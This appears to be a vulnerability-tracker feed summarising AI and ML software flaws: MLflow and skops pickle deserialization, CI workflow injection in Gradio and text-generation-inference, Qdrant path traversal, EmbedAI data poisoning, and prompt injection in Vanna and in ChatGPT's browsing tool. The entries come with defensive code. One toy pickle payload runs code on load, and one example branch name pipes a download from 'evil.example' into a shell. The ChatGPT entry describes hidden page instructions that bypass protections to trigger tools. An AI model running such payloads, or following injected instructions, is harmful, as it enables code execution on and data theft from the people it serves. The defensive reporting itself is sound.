All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
A workflow file (a set of automated tasks) in the Gradio project has a security flaw where it runs code from external copies of the repository without proper safety checks, allowing attackers to steal sensitive secrets (like API keys and authentication tokens). This happens because the workflow trusts and executes code from forks (external copies of the project, which anyone can create) in an environment that has access to the main repository's secrets.
CVE-2024-37061 is a remote code execution vulnerability (the ability for an attacker to run commands on someone else's system) in MLflow (a machine learning platform) version 1.11.0 and newer. An attacker can create a malicious MLproject file that executes arbitrary code when a user runs it on their computer.
CVE-2024-37060 is a vulnerability in MLflow (a machine learning platform) version 1.27.0 and newer where deserialization of untrusted data (the process of converting received data back into usable objects without checking if it's safe) can occur. A malicious Recipe (a workflow template in MLflow) could exploit this to execute arbitrary code (run any commands) on a user's computer when the Recipe is run.
CVE-2024-37059 is a vulnerability in MLflow (a platform for managing machine learning workflows) version 0.5.0 and newer where deserialization of untrusted data (converting data from an external format into usable code without verifying it's safe) can occur. An attacker can upload a malicious PyTorch model (a type of machine learning model file) that executes arbitrary code (runs any commands they choose) on a user's computer when the model is opened or used.
CVE-2024-37058 is a vulnerability in MLflow (a platform for managing machine learning workflows) version 2.5.0 and newer that allows deserialization of untrusted data (the process of converting data from storage into usable objects without checking if it's safe). An attacker can upload a malicious Langchain AgentExecutor model (a type of AI component) that runs arbitrary code on a user's system when that user interacts with it.
CVE-2024-37057 is a vulnerability in MLflow (an open-source machine learning platform) versions 2.0.0rc0 and newer that allows deserialization of untrusted data (converting data from an untrusted source back into executable code). An attacker could upload a malicious TensorFlow model (a type of machine learning model) that runs arbitrary code (any commands an attacker chooses) on a user's computer when the model is loaded or used.
CVE-2024-37056 is a vulnerability in MLflow (a machine learning platform) version 1.23.0 and newer that allows deserialization of untrusted data (loading and executing code from data that hasn't been verified as safe). An attacker can upload a malicious LightGBM or scikit-learn model (machine learning libraries) that runs arbitrary code (any commands the attacker chooses) on a user's computer when the model is opened.
CVE-2024-37055 is a vulnerability in MLflow (a machine learning platform) versions 1.24.0 and newer where deserialization of untrusted data (the process of converting saved data back into usable objects without checking if it's safe) can occur. This allows an attacker to upload a malicious pmdarima model (a machine learning model for time-series forecasting) that runs arbitrary code (any commands the attacker chooses) on a user's computer when the model is loaded and used.
CVE-2024-37054 is a vulnerability in MLflow (a machine learning platform) version 0.9.0 and newer that allows deserialization of untrusted data (unsafe processing of data from untrusted sources). An attacker can upload a malicious PyFunc model (a machine learning model format) that runs arbitrary code (any commands an attacker wants) on a user's computer when the model is used.
CVE-2024-37053 is a vulnerability in MLflow (a machine learning platform) version 1.1.0 and newer where deserialization of untrusted data (the process of converting saved data back into usable code without checking if it's safe) can occur. An attacker can upload a malicious scikit-learn model (a machine learning library) that runs arbitrary code (any commands the attacker chooses) on a user's computer when the model is loaded and used.
CVE-2024-37052 is a vulnerability in MLflow (a machine learning platform) version 1.1.0 and newer where deserialization of untrusted data (converting data from an external format back into code without checking if it's safe) allows a malicious scikit-learn model (a machine learning library) to execute arbitrary code on a user's system when the model is loaded and used. This means an attacker could upload a harmful model that runs malicious commands when someone interacts with it.
CVE-2024-37065 is a vulnerability in skops (a Python library) version 0.6 and newer where deserialization (the process of converting saved data back into usable code) of untrusted data can occur, allowing a maliciously crafted model file to run arbitrary code on a user's computer when loaded.
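The MLflow entries above (CVE-2024-37052 through CVE-2024-37061) and the skops issue share one root cause: model formats built on Python's pickle, which lets serialized data name a callable for the loader to invoke. A minimal toy demonstration of the mechanism (not code from either project; a harmless `eval` stands in for what a real payload would do with `os.system`):

```python
import pickle

class Malicious:
    """Toy object whose deserialization runs attacker-chosen code."""

    def __reduce__(self):
        # pickle records (callable, args) and calls it on load.
        # A real attacker would return (os.system, ("...",)) instead.
        return (eval, ("6 * 7",))

payload = pickle.dumps(Malicious())

# The code runs during loads(), before the caller can inspect the object.
result = pickle.loads(payload)
print(result)  # 42
```

This is why loading any pickle-backed model from an untrusted source is equivalent to running a program from that source.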
A command injection vulnerability (a type of attack where specially crafted input tricks a system into running unintended commands) exists in the Gradio project's automated workflow file, where unsanitized (unfiltered) repository and branch names could be exploited to steal sensitive credentials like authentication tokens. The vulnerability affects Gradio versions up to @gradio/video@0.6.12.
Qdrant version 1.9.0-dev has a vulnerability in its snapshot recovery process (a feature that restores a database from a backup) that allows attackers to read and write arbitrary files on the server by inserting symlinks (shortcuts to other files) into snapshot files. This could potentially give attackers complete control over the system.
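A snapshot restorer can defend against this class of attack by screening an archive for link entries before extracting anything. A generic sketch using Python's `tarfile` (illustrative only, not Qdrant's actual patch — Qdrant is written in Rust):

```python
import io
import tarfile

def reject_links(data: bytes) -> None:
    """Refuse archives containing symlinks or hardlinks.

    A restored snapshot must not contain entries that point outside
    its own directory, or later reads/writes follow the link.
    """
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        for member in tar.getmembers():
            if member.issym() or member.islnk():
                raise ValueError(f"link entry in snapshot: {member.name}")
```

On recent Python versions the same goal can be reached with `tarfile`'s built-in extraction filters (`filter="data"`), which reject such members at extraction time.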
The Vanna library (a tool for generating data visualizations) has a vulnerability where attackers can use prompt injection (tricking an AI by hiding instructions in its input) to alter how the library processes user requests and run arbitrary Python code instead of creating the intended visualization. This happens when external input is sent to the library's 'ask' method with visualization enabled, which is the default setting, leading to remote code execution (attackers being able to run commands on a system they don't own).
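Executing model-generated code is inherently risky; where it must happen, the generated source can at least be screened before being passed to `exec`. A deliberately coarse sketch (hypothetical, not Vanna's actual mitigation — real containment requires a sandboxed process, not an AST check):

```python
import ast

def looks_like_plotting_only(code: str) -> bool:
    """Coarse, incomplete screen for LLM-generated plotting code.

    Rejects code that imports modules or touches dunder attributes,
    two common escape hatches in injected payloads.
    """
    tree = ast.parse(code)
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return False
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            return False
    return True

print(looks_like_plotting_only("import os; os.system('id')"))  # False
```

Screens like this reduce accidental exposure but cannot be relied on against a determined prompt-injection attacker.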
A code injection vulnerability (injecting malicious code into a system) exists in the huggingface/text-generation-inference repository's workflow file, where user input from GitHub branch names is unsafely used to build commands. An attacker can exploit this by creating a malicious branch name and submitting a pull request, potentially executing arbitrary code on the GitHub Actions runner (the automated system that runs tests and builds for the project).
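The underlying mistake in both workflow advisories is interpolating attacker-controlled strings (branch or repository names) directly into a shell command. Sketched in Python for illustration — in GitHub Actions YAML the analogous fix is passing such values through environment variables instead of `${{ }}` interpolation inside `run:` steps:

```python
import shlex

# Hypothetical hostile branch name: the semicolon would end the
# checkout command and run the attacker's payload as a new command.
branch = "feat; curl evil.example | sh"

# Unsafe: building one shell string lets the shell parse the payload.
unsafe = f"git checkout {branch}"

# Safer: quote the value so the shell sees a single literal argument.
safe = f"git checkout {shlex.quote(branch)}"
print(safe)
```

Safer still is avoiding the shell entirely and passing arguments as a list (e.g. `subprocess.run(["git", "checkout", branch])`), so no shell parsing ever occurs.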
Qdrant version 1.9.0-dev has a path traversal vulnerability (a security flaw where an attacker manipulates file paths to access unintended locations) in its snapshot upload endpoint that allows attackers to write files anywhere on the server by encoding special characters in the request. This could lead to complete system compromise through arbitrary file upload and overwriting.
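Upload handlers can defend against this class of bug by resolving the final path and verifying it still lies inside the intended directory — and the check must run after any URL decoding, since the Qdrant issue used encoded special characters. A generic Python sketch (not Qdrant's actual patch):

```python
from pathlib import Path

def safe_join(base: str, user_path: str) -> Path:
    """Join a user-supplied name onto a base directory, safely.

    Resolves the combined path and rejects anything that escapes
    `base`, such as "../../etc/passwd".
    """
    base_dir = Path(base).resolve()
    target = (base_dir / user_path).resolve()
    if not target.is_relative_to(base_dir):
        raise ValueError(f"path escapes upload directory: {user_path}")
    return target

print(safe_join("/srv/snapshots", "backup.snapshot"))
```

`Path.is_relative_to` requires Python 3.9+; on older versions the same check can be written with `os.path.commonpath`.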
EmbedAI has a security flaw that allows data poisoning attacks (injecting false or harmful information into an AI system) through a CSRF vulnerability (cross-site request forgery, where an attacker tricks a user's browser into performing unwanted actions on a site they're logged into). An attacker can direct a logged-in user to a malicious webpage that exploits weak session management and permissive CORS policies (which control what external websites can access the application), silently uploading bad data that corrupts the application's language model.
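The standard mitigation is a per-session anti-CSRF token that a cross-site page cannot read, verified on every state-changing request. A minimal, framework-agnostic sketch of the token handling (illustrative, not EmbedAI's code):

```python
import hmac
import secrets

def new_csrf_token() -> str:
    # Generated once per session, stored server-side, and embedded in
    # every form or request header the legitimate frontend sends.
    return secrets.token_hex(32)

def csrf_token_valid(session_token: str, submitted: str) -> bool:
    # Constant-time comparison; a forged cross-site request cannot
    # know the session's token, so it fails this check.
    return hmac.compare_digest(session_token, submitted)
```

Pairing this with `SameSite` cookies and a strict CORS allowlist closes the attack path described above.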
Fix: Update to version v1.9.0, where the issue is fixed.
NVD/CVE Database
Ollama versions before 0.1.34 have a security flaw where they don't properly check the format of digests (sha256 hashes that should be exactly 64 hexadecimal digits) when looking up model file paths. This allows attackers to bypass security checks by using invalid digest formats, such as ones with too few digits, too many digits, or paths starting with '../' (a path traversal technique that accesses files outside the intended directory).
Fix: Update Ollama to version 0.1.34 or later. The fix is available in the release notes at https://github.com/ollama/ollama/compare/v0.1.33...v0.1.34 and was implemented in pull request #4175.
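The class of fix here is strict input validation: accept a digest only if it is exactly 64 hex digits, before it ever reaches a filesystem path. A sketch of such a check (illustrative Python, not Ollama's actual Go code):

```python
import re

# Exactly 64 lowercase hexadecimal digits, nothing more.
HEX64 = re.compile(r"[0-9a-f]{64}")

def valid_digest(digest: str) -> bool:
    # fullmatch rejects digests that are too short, too long,
    # uppercase, or that smuggle in traversal sequences like "../".
    return HEX64.fullmatch(digest) is not None

print(valid_digest("a" * 64))          # True
print(valid_digest("../" + "a" * 61))  # False
```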
NVD/CVE Database
Fix: This issue was fixed in version 2.0.0. Users should update to version 2.0.0 or later.
NVD/CVE Database
Fix: The issue is fixed in version 1.9.0. Users should upgrade to this version or later.
NVD/CVE Database
ChatGPT's browsing tool can be tricked into automatically invoking other tools (like image creation or memory management) when users visit websites containing hidden instructions, a vulnerability known as prompt injection (tricking an AI by hiding instructions in its input). While OpenAI added some protections, minor prompting tricks can bypass them, and this issue affects other AI applications as well.
Fix: For custom GPTs with AI Actions, creators can use the x-openai-isConsequential flag as a mitigation to put users in control, though the source notes this approach 'still lacks a great user experience, like better visualization to understand what the action is about to do.'
Embrace The Red